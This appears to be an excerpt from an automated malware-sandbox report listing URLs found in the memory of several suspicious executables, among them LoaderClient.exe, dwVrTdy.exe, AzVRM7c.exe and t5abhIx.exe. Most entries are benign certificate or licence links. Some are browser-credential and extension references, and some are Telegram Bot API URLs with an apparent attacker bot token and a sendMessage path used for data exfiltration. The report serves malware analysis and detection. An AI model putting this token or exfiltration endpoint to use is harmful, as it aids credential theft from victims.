0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                        Source: LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digif
                        Source: b1dc05533c.exe, 00000014.00000003.269582670864.0000000003BC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.goog/gtsr100
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                        Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: LoaderClient.exe, 0000002F.00000002.269881633471.00000178EAAA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pki.goog/repo/certs/gtsr1.der04
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883225373.00000178EAE47000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868352131.00000178EAE3C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/draft-hixie-thewebsocketprotocol-76
                        Source: LoaderClient.exe, 0000002F.00000003.269855268886.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269865238563.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269856730125.00000178EA746000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852733549.00000178EAE35000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857419090.00000178EA796000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269862666473.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269872655017.00000178EA79B000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852243411.00000178EA731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc4880
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269882618307.00000178EAD5A000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269862182845.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269857780538.00000178EAD32000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269867565150.00000178EAD58000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269852023135.00000178EAD20000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://tools.ietf.org/html/rfc5869
                        Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: LoaderClient.exe, 0000002E.00000003.269788228941.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: C1J7SVw.exe, 00000007.00000000.269460124832.0000000000423000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: http://usbtor.ru/viewtopic.php?t=798)Z
                        Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.cs.ucdavis.edu/~rogaway/ocb/license.htm
                        Source: LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
                        Source: LoaderClient.exe, 0000002E.00000003.269805355749.0000023A40637000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000002.269903631046.0000023A40637000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40636000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269803969976.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269856585205.00000178EA3B8000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269875318381.00000178EAE7C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269853538063.00000178EA3B4000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269871977181.00000178EAE78000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883457246.00000178EAE80000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                        Source: LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883362038.00000178EAE67000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269869753931.00000178EAE5E000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269868015957.00000178EAEA4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cs.ucdavis.edu/~rogaway/papers/keywrap.pdf
                        Source: LoaderClient.exe, 0000002E.00000003.269785211839.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40633000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800064672.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269791889062.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269792848537.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269786754464.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784743217.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269782316897.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269781968848.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002E.00000003.269788528417.0000023A40628000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.coO
                        Source: b1dc05533c.exe, 00000014.00000002.269672784820.0000000001257000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269641953537.0000022434300000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269646928475.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269654227806.0000025635692000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269664887145.0000025635692000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF59000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE923000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
                        Source: LoaderClient.exe, 0000002F.00000003.269851671317.00000178EA352000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
                        Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.rfc-editor.org/info/rfc7253
                        Source: LoaderClient.exe, 0000002F.00000003.269851106200.00000178EAEA7000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269850768412.00000178EAE4C000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000003.269866340442.00000178EAEAB000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269883610008.00000178EAF0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.tarsnap.com/scrypt/scrypt-slides.pdf
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575735102.000002243262A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593674669.00000256355F2000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593953212.00000256355F5000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593045061.0000025635606000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269594381110.00000256355F8000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620857986.00000247ADEB5000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com1
                        Source: dwVrTdy.exe, 00000028.00000003.269593403578.0000025635665000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com4
                        Source: dwVrTdy.exe, 00000028.00000003.269593045061.0000025635606000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com8
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576784135.0000022432690000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.com9
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.comA:
                        Source: t5abhIx.exe, 0000002B.00000003.269667123223.000001B3EE93D000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269673713462.000001B3EE955000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269667320015.000001B3EE954000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE95F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.coma
                        Source: dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.comdos
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666926038.000001B3EE8D9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.comins.js
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.comlhkhi
                        Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.commgoekp#
                        Source: AzVRM7c.exe, 00000029.00000003.269621182033.00000247ADF03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.commhnfd
                        Source: dwVrTdy.exe, 00000026.00000003.269574954679.0000022432670000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.0000022432670000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.commhnfdidos
                        Source: t5abhIx.exe, 0000002B.00000003.269665469215.000001B3EE8C5000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665658896.000001B3EE8C9000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269666253189.000001B3EE8D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.youtube.commieda
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                        Source: b1dc05533c.exe, 00000014.00000003.269582770018.0000000003A0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                        Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269591113981.00000256355FF000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592431240.000002563560A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com
                        Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com36975082
                        Source: dwVrTdy.exe, 00000026.00000003.269573791610.0000022432625000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269591113981.00000256355FF000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592431240.000002563560A000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592469825.000002563560C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com:443
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000002.269640823894.0000022432659000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/$
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/E
                        Source: AzVRM7c.exe, 00000029.00000002.269641172734.00000247ADF08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/G
                        Source: dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/K
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/Q
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/U
                        Source: dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/V
                        Source: t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o
                        Source: t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F0757000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0o/sendMessage?chat_id=74270
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7855878545:AAEEMUvgpX9jTAxlDd2gM_Sbv2jbI6-5_0oL
                        Source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmpString found in binary or memory: https://api.telegram.org/botFailed
                        Source: t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/cal
                        Source: t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/k
                        Source: AzVRM7c.exe, 00000029.00000002.269641987403.00000247AFC90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/p
                        Source: dwVrTdy.exe, 00000028.00000002.269666025995.00000256362A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/r
                        Source: t5abhIx.exe, 0000002B.00000002.269685044935.000001B3F076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/w
                        Source: dwVrTdy.exe, 00000026.00000002.269641953537.000002243431F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/z
                        Source: LoaderClient.exe, 0000002E.00000003.269804140270.0000023A4062B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://blog.jaraco.com/skeleton
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
                        Source: b1dc05533c.exe, 00000014.00000003.269557138007.0000000003A2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                        Source: b1dc05533c.exe, 00000014.00000003.269558571952.0000000003BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
                        Source: dwVrTdy.exe, 00000026.00000003.269622533253.000002243266F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/we
                        Source: t5abhIx.exe, 0000002B.00000003.269667407590.000001B3EE927000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore35
                        Source: dwVrTdy.exe, 00000026.00000003.269574758482.0000022432652000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore85
                        Source: dwVrTdy.exe, 00000026.00000003.269574618681.0000022432672000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269575451517.000002243267B000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576282041.000002243267B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreB
                        Source: AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreG
                        Source: dwVrTdy.exe, 00000028.00000003.269595629729.0000025635684000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269595338086.000002563566A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreI
                        Source: AzVRM7c.exe, 00000029.00000003.269621589022.00000247ADEC9000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269622941363.00000247ADECC000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269621498842.00000247ADEB9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreN
                        Source: dwVrTdy.exe, 00000026.00000003.269576629725.00000224326CD000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000026.00000003.269576483207.00000224326BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstorec
                        Source: AzVRM7c.exe, 00000029.00000003.269619997889.00000247ADF05000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269620285888.00000247ADF22000.00000004.00000020.00020000.00000000.sdmp, AzVRM7c.exe, 00000029.00000003.269619838474.00000247ADEFC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstoreu
                        Source: t5abhIx.exe, 0000002B.00000002.269683773773.000001B3EE8C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/
                        Source: t5abhIx.exe, 0000002B.00000003.269665419253.000001B3EE8DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx
                        Source: t5abhIx.exe, 0000002B.00000003.269664517694.000001B3EE912000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269664675085.000001B3EE919000.00000004.00000020.00020000.00000000.sdmp, t5abhIx.exe, 0000002B.00000003.269665082563.000001B3EE919000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx#
                        Source: dwVrTdy.exe, 00000028.00000003.269592748308.0000025635635000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269593109789.0000025635645000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269592856745.000002563563E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/service/update2/crx)
